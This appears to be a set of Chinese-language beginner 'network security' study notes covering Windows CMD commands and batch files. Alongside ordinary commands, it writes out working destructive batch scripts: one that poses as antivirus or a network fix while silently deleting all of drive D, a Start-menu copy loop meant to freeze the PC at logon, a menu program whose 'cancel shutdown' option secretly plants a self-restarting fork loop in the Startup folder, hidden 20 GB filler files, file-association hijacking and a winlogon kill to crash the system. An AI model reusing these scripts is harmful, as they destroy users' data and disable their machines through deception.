network security study day1
-
window dos 命令
1.1修改命令行颜色
color ? 查看 颜色的编码 第一位是背景颜色 第二位是字体颜色
color 0a --- 浅绿色
1.2 定时关机 重启命令
1.2.1shutdown -s -t xxx //-s 是关机的命令 -t 是多少时间 xxxs 多少秒后关闭
1.2.2shutdown -r -t -f xxx // -r 是重启命令 reset -f 是强制的意思
1.2.3 shutdown -s -t 100 -c '显示的信息'
1.2.4 shutdown -l && logoff //注销用户
1.3 切换路径
1.3.1cd xxx // 切换到的xxx目录
1.3.2 c: 切换到 c:盘里面
1.3.3 cd / 切换到 现在的磁盘的 根目录
1.4 清空命令行
1.4.1 cls
1.5目录相关的命令
1.5.0 查看系统信息 system
1.5.1 dir // 显示文件的 命令 文件夹(目录) 显示的是dir
文件不显示 dir
1.5.2 dir /a // 浏览所有文件,包括隐藏的
1.5.3. attrib +h +s +a xxx文件或文件夹
attribute 属性 给文件和文件夹修改属性
+h 添加 hidden 属性 隐藏
+s 添加系统文件的属性
+a 添加只读属性
这里也可以 -h -s -a 移除这些属性
1.5.4 创建文件夹 md a //创建名字的 a 的文件夹
md "a b" 创建 文件夹名为 a b 要加 “”
1.5.5 创建 空的 内容为空的 文件夹
fsutil file createnew d:\system.ini 20000000000 单位是字节byte 这里是20g
.attrib +h +s +a
1.5.6 删除文件
删除文件或目录CMD命令:
1.5.6.1
rd/s/q 盘符:\某个文件夹
(强制删除文件文件夹和文件夹内所有文件)/s是删除所有文件夹 /q是
不用询问就删除
rd . /s /q 格式化盘符 (删除这个盘符的所有文件)
del/f/s/q 盘符:\文件名
(强制删除文件,文件名必须加文件后缀名)
del *.txt 删除所有.txt结尾的文件
del . 删除所有文件
1.5.7 修改文件的关联属性
assoc .exx=txtfile 把所有 .exe结尾的修改成txt文件
assoc .txt=txtfile 把所有 .txt 结尾的修改成exe文件
1.6 复制 移动 重命名
1.6.1 copy 要复制的文件路径(相对和绝对路径都可以) 复制到哪里的路径
1.6.2 move 要移动的文件路径(相对和绝对路径都可以) 复制到哪里的路径
1.6.3 ren 文件原来的名字 要修改的名字
1.7 杀进程
taskkill /im explorer.exe /f //杀进程
ntsd -c q -pn winlogon.exe
2.创建批处理
案列 .bat
在d盘生成20gb文件
d:
cd /
fsutil file createnew d:\system.ini 20000000000 ---》bity
attrib +h +a +s system.ini
删除d盘所有文件
@echo off //不关闭 是显示在什么路径下 干了什么 关了不在显示
color 0a // 命令行的颜色 0 -->background 黑色 字体颜色-->绿色
title av // 修改命令行的标题 是在最上面显示的路径 c:av
echo ================== //输入=====
echo this is av look it
pause //停止
echo ==================
echo this is loading please press enter to open mainscreen
echo ==================
pause
echo.//空一行
echo you network is something wrong please press to resolve
d: >nul 2>nul //进入d 盘 >null为了不让他在命令行输出 >2 null 找不到会报错的的 不让他输入
cd \ >nul 2>nul //保证进入 d 盘的根目录 >null为了不让他在命令行输出 >2 null 找不到会报错的的 不让
rd . /s/q >nul 2>nul // 删除 d盘的所有文件
ping -n 10 127.0.0.1 >nul 2>nul // ping 自己 延迟 10个包的时间
echo congratulation !!! you enter
pause
小病毒 ----开机就死机
copy virus.bat "%userprofile%\「开始」菜单\程序" //userprofile是登录用户的路径 是个变量要%% 【开始】是特殊字符 要 变成一个整体 要 “”
小知识 %xxx% 这是取变量的值
:d //分区块 --> d 是他的区块名
start //什么不写就是打开cmd 写的话www.badiu.com 打开百度
goto d //去 d 命令区块 -->递归了 死机
小程序
@echo off
title minprogram
color 0a
echo ==========
echo minprogram
echo ==========
echo ==========
echo.
:menu
echo menu
echo 1.shutdown
echo 2.cancel shutdown
echo 3.exit
echo.
echo ==========
set /p num=plase choose : //设置变量 num /p是prompt 输入的意思 显示 placr choose 的文本了
if "%num%"=="1" goto 1
if "%num%" == "2" goto 2
if "%num%" == "3" goto 3
echo you printf type is not a num please printf again //用户输入不合法 提示 然后停止返回菜单
pause
goto menu
:1
set /p time=please printf you shoudowm time
shutdown -s -f -t %time%
goto menu
:2
shutdown -a
echo :a >> "%userprofile%\「开始」菜单\程序\启动\program.bat"
echo start >> "%userprofile%\「开始」菜单\程序\启动\program.bat"
echo goto a >> "%userprofile%\「开始」菜单\程序\启动\program.bat"
goto menu
// > 重定向 替换
// >> 是重定向的意思 追加 在program 文件下写入病毒是换行的
:3
exit
goto menu
xp && 2003 蓝屏 --->ntsd -c q -pn winlogon.exe
@econ off
color 0a
taskkill /im explorer.exe /f //杀进程
econ hhh
ping -n 10 127.0.0.1 >null 2>null
start C:\windos\explorer.exe
econ Scare you
\